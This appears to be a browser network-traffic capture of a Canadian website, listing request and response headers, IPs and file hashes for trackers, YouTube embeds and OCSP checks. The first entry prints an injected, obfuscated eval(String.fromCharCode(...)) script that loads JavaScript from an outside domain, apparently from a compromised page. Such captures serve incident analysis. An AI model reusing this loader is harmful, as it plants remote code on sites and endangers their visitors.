6,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%2011
4,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
Hash acbaa06e4144eaac4dd869a2b1438679
4c887877de01ffcd9e5515a57646b243cfe62e1e
0394798d86e326ae6d317b9e8859b05e9a1f7ea5aa20e52a12545139db706497
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%2
0112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 404 Not Found
date: Wed, 21 Sep 2022 04:23:41 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 74e006e58f4fb4ff-OSL
X-Firefox-Spdy: h2
app.leadfox.co/service/track/get/
172.67.71.4 200 OK 135 B URL HTTP/2 app.leadfox.co/service/track/get/
IP 172.67.71.4:0
File type JSON data\012- , ASCII text, with no line terminators
Hash d9f0292cdfdf72a491ed3b6edf6d3a50
fd67e1caa13414b6f7af7466f60c8c716ca1a403
15702e626537b4bca950e9873e5fb05b654e9742fc319e8d346429f78edf76a0
GET /service/track/get/ HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:42 GMT
content-type: application/json
set-cookie: __lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq; expires=Wed, 18-May-2033 03:33:20 GMT; Max-Age=336265778; path=/; SameSite=None; Secure
access-control-allow-origin: https://www.comm2po.ca
x-kong-upstream-latency: 28
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zS%2Fegz60J8R%2F6JCU9ifOCJFpMpJYN02ghJgAffOdfR%2B3kLWdi%2BlWGnomPfloZ2Dh4y5%2F6NwIWSRFcTT2KqVl8O%2B45RJBE%2BQfjUKvRGicq5qBMsAu5Yy%2FzUw4IyXAaFbd"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006ebfb88b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
rest.leadfox.co/v1/popup/list/5b893d1adc933c222e4466ab/?url=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&__lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq
172.67.71.4 200 OK 6 B URL HTTP/2 rest.leadfox.co/v1/popup/list/5b893d1adc933c222e4466ab/?url=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&__lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq
IP 172.67.71.4:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 7f64cc8ba7692dcd42d5a25efe313d08
e05a760455d4b1e5f8d0f125f622f1716bc2bebf
90a814f9e7afea5be03fd1f20955d31092a0e3e81f5b669f224c2162bec3e8eb
GET /v1/popup/list/5b893d1adc933c222e4466ab/?url=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&__lm=1663734222-3AiTtvc3OCn7PF0Ggujb9qid6hM3P1oFownHSqxuSLpvfm3mHanEq HTTP/1.1
Host: rest.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:43 GMT
content-type: application/json; charset=utf-8
access-control-allow-origin: https://www.comm2po.ca
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
access-control-expose-headers: X-Rate-Limit-Limit,X-Rate-Limit-Remaining,X-Rate-Limit-Reset,X-Retry-As
x-rate-limit-limit: 100
x-rate-limit-remaining: 99
x-rate-limit-reset: 1
etag: W/"2-l9Fw4VUO7kr8CvBlt4zaMCqXZ0w"
x-kong-upstream-latency: 7
x-kong-proxy-latency: 1
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZB5iX0hnK0GksSUJm60wdULTsZRhDiDbgogGbmdlvendEpP2zU4yET%2B5QJW282yGFQ1ciqfeeOfZJHGtBzyPJf%2BB%2BH%2FcxIgm7gFmTmTYeeGOyfpYh4DxSx8GUE1GVNFoKg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006f11beab50c-OSL
content-encoding: br
X-Firefox-Spdy: h2
jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
142.250.74.74 200 OK 31 kB URL HTTP/2 jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
IP 142.250.74.74:0
File type JSON data\012- , ASCII text, with very long lines (65536), with no line terminators
Hash 688f942932135982771334d6ffa8b251
6793fde38fe29320fbc828b05244fefa36e593a9
464f5b77f6db2a38b32d1d56f5ac869ef526202d27f50b44e2431384fb9f32fe
POST /$rpc/google.internal.waa.v1.Waa/Create HTTP/1.1
Host: jnn-pa.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Goog-Api-Key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
Content-Type: application/json+protobuf
X-User-Agent: grpc-web-javascript/0.1
Content-Length: 24
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/json+protobuf; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:44 GMT
server: ESF
cache-control: private
content-length: 30932
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.youtube-nocookie.com
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash ada29f357ebf16bf037a8f7ca0943687
08a6e41c5fa688ca538b3e4b30ec8100fb292aaf
e368e32c7f8c8d2ae99520c324a2571ed402c80f76aec3c05a9711df12150de5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
i.ytimg.com/vi_webp/GkX0bwjE7pk/maxresdefault.webp
216.58.207.214 200 OK 60 kB URL HTTP/2 i.ytimg.com/vi_webp/GkX0bwjE7pk/maxresdefault.webp
IP 216.58.207.214:0
File type RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x720, Scaling: [none]x[none], YUV color, decoders should clamp\012- data
Hash 964569bfb2431c7c09b65a7f057db746
e6af6fb23be3dd48d8733f576144e3e5895c1bb8
ca189c520c8589dd262c282b92da639800ca3205e8355da8477551ae9c9dd148
GET /vi_webp/GkX0bwjE7pk/maxresdefault.webp HTTP/1.1
Host: i.ytimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/webp
vary: Origin
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
content-length: 59892
date: Wed, 21 Sep 2022 04:23:44 GMT
expires: Wed, 21 Sep 2022 06:23:44 GMT
cache-control: public, max-age=7200
etag: "1552324497"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash ada29f357ebf16bf037a8f7ca0943687
08a6e41c5fa688ca538b3e4b30ec8100fb292aaf
e368e32c7f8c8d2ae99520c324a2571ed402c80f76aec3c05a9711df12150de5
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 28 kB IP 142.250.74.3:0
Hash ca0e377cd4845f7c45ba415e05cc80ca
66723dd675a75aaf8054aed87a66608edba3ac2a
836e2a67b80794c9e19952be85fdb8c699a2e712ae140a44c0fbbebb9e084621
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 67801aaa77b0226b24e48c3d2b0055ec
284e0390a9afeed4f556a2e7eac0e75c33b01d6c
b576b0b0307ccf104137b1427b246e30570da6c64a1c8116fe4e765a0562a308
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.google.com/js/th/0Q0sPaTf27KkVV0qBrYI7cmJeSJkpG4CF1zVddAZEjs.js
142.250.74.164 200 OK 14 kB URL HTTP/2 www.google.com/js/th/0Q0sPaTf27KkVV0qBrYI7cmJeSJkpG4CF1zVddAZEjs.js
IP 142.250.74.164:0
File type ASCII text, with very long lines (36110)
Hash d348ea7c67cf70cc27add8ec15920c5f
46b2db74425f5c6c10c69831277b83c76c8c24b8
e9198b139add4e4683e04549366c63b57000c4e9d719c0e5820124d63d0fccff
GET /js/th/0Q0sPaTf27KkVV0qBrYI7cmJeSJkpG4CF1zVddAZEjs.js HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="botguard-scs"
report-to: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
content-length: 14308
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 05:09:26 GMT
expires: Thu, 14 Sep 2023 05:09:26 GMT
cache-control: public, max-age=31536000
last-modified: Tue, 13 Sep 2022 11:00:00 GMT
content-type: text/javascript
age: 602058
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
142.250.74.74 200 OK 0 B URL HTTP/2 jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
IP 142.250.74.74:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
OPTIONS /$rpc/google.internal.waa.v1.Waa/GenerateIT HTTP/1.1
Host: jnn-pa.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type,x-goog-api-key,x-user-agent
Referer: https://www.youtube-nocookie.com/
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
access-control-allow-origin: https://www.youtube-nocookie.com
vary: origin, referer, x-origin
access-control-allow-methods: DELETE,GET,HEAD,OPTIONS,PATCH,POST,PUT
access-control-allow-headers: content-type,x-goog-api-key,x-user-agent
access-control-max-age: 3600
date: Wed, 21 Sep 2022 04:23:44 GMT
content-type: text/html
server: ESF
content-length: 0
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
142.250.74.74 200 OK 110 B URL HTTP/2 jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
IP 142.250.74.74:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 6613996d1afbfc5c8b0c178e13e48982
76a22fbef54b8033253709c6a03c245ce321ebd0
5a8d5a6b297919e2427b258f5db3fa1bedf38a686f50b102e628c6e3975a01f6
POST /$rpc/google.internal.waa.v1.Waa/GenerateIT HTTP/1.1
Host: jnn-pa.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Goog-Api-Key: AIzaSyDyT5W0Jh49F30Pqqtyfdf7pDLFKLJoAnw
Content-Type: application/json+protobuf
X-User-Agent: grpc-web-javascript/0.1
Content-Length: 1019
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/json+protobuf; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:44 GMT
server: ESF
cache-control: private
content-length: 110
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.youtube-nocookie.com
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
yt3.ggpht.com/ytc/AMLnZu8WZ6lesBpayHSkCT1f-vYmii1wauL_NQ2urUzi=s68-c-k-c0x00ffffff-no-rj
142.250.74.161 200 OK 3.6 kB URL HTTP/2 yt3.ggpht.com/ytc/AMLnZu8WZ6lesBpayHSkCT1f-vYmii1wauL_NQ2urUzi=s68-c-k-c0x00ffffff-no-rj
IP 142.250.74.161:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 68x68, components 3\012- data
Hash 45103532a0dc520bb42ac700f59f50d1
13f9090ff260aa2a7b6580f1f09075493415c585
5deaa83a4f1228d8407e68c359516bfab80f7f3cf90cea29275bc493dde0bfa9
GET /ytc/AMLnZu8WZ6lesBpayHSkCT1f-vYmii1wauL_NQ2urUzi=s68-c-k-c0x00ffffff-no-rj HTTP/1.1
Host: yt3.ggpht.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-expose-headers: Content-Length
etag: "v47"
expires: Thu, 22 Sep 2022 04:23:44 GMT
cache-control: public, max-age=86400, no-transform
content-disposition: inline;filename="unnamed.jpg"
content-type: image/jpeg
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Wed, 21 Sep 2022 04:23:44 GMT
server: fife
content-length: 3571
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 67801aaa77b0226b24e48c3d2b0055ec
284e0390a9afeed4f556a2e7eac0e75c33b01d6c
b576b0b0307ccf104137b1427b246e30570da6c64a1c8116fe4e765a0562a308
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:44 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash c81d42d817c63fd387f875fae88f126a
88fa4a4aa864600dfc025c7077d355d38d2d22b9
81ad3d8e554a0fd4530752e92a769bb4689229fb097bb09076bd85c7d3208fe7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash c81d42d817c63fd387f875fae88f126a
88fa4a4aa864600dfc025c7077d355d38d2d22b9
81ad3d8e554a0fd4530752e92a769bb4689229fb097bb09076bd85c7d3208fe7
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:45 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
rr1---sn-capm-vnae.googlevideo.com/videoplayback?expire=1663755824&ei=0JEqY76QNYHeyAWChbXQDw&ip=91.90.42.154&id=o-AHqaFY8y79JWBeblZgztULAXASrB4mTuMAowpFI1XOrC&itag=244&aitags=133%2C134%2C135%2C136%2C137%2C160%2C242%2C243%2C244%2C247%2C248%2C278&source=yt_otf&requiressl=yes&mh=g8&mm=31%2C29&mn=sn-capm-vnae%2Csn-5goeen7y&ms=au%2Crdu&mv=u&mvi=1&pl=21&spc=yR2vp1T1W7aHFtRn6J0K4KP-LwEwe9A&vprv=1&mime=video%2Fwebm&ns=ZBnH3l7cKy58I5d0YjEmkS4I&otf=1&otfp=1&dur=0.000&lmt=1551808198699615&mt=1663733329&fvip=1&keepalive=yes&fexp=24001373%2C24007246&c=WEB_EMBEDDED_PLAYER&n=fXvJLS6ESpnX-g&sparams=expire%2Cei%2Cip%2Cid%2Caitags%2Csource%2Crequiressl%2Cspc%2Cvprv%2Cmime%2Cns%2Cotf%2Cotfp%2Cdur%2Clmt&sig=AOq0QJ8wRAIgYxnNjkQV26UQCHzKVsNAV7Uu5yWVTYJ_NfzUi3bI0bcCIFyZwy5TXowyiAaRJvLecB7TJk3vkOKekkrAGnd4vCmH&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl&lsig=AG3C_xAwRQIge2u6yOzN7HWQEhaqSzjTKPPHXNlG9e-xDUxlrnPUU5QCIQDB7egbJeKK_G9a9aAONNRP0FobjudGrmYIgphgFJjSMg%3D%3D&alr=yes&cpn=2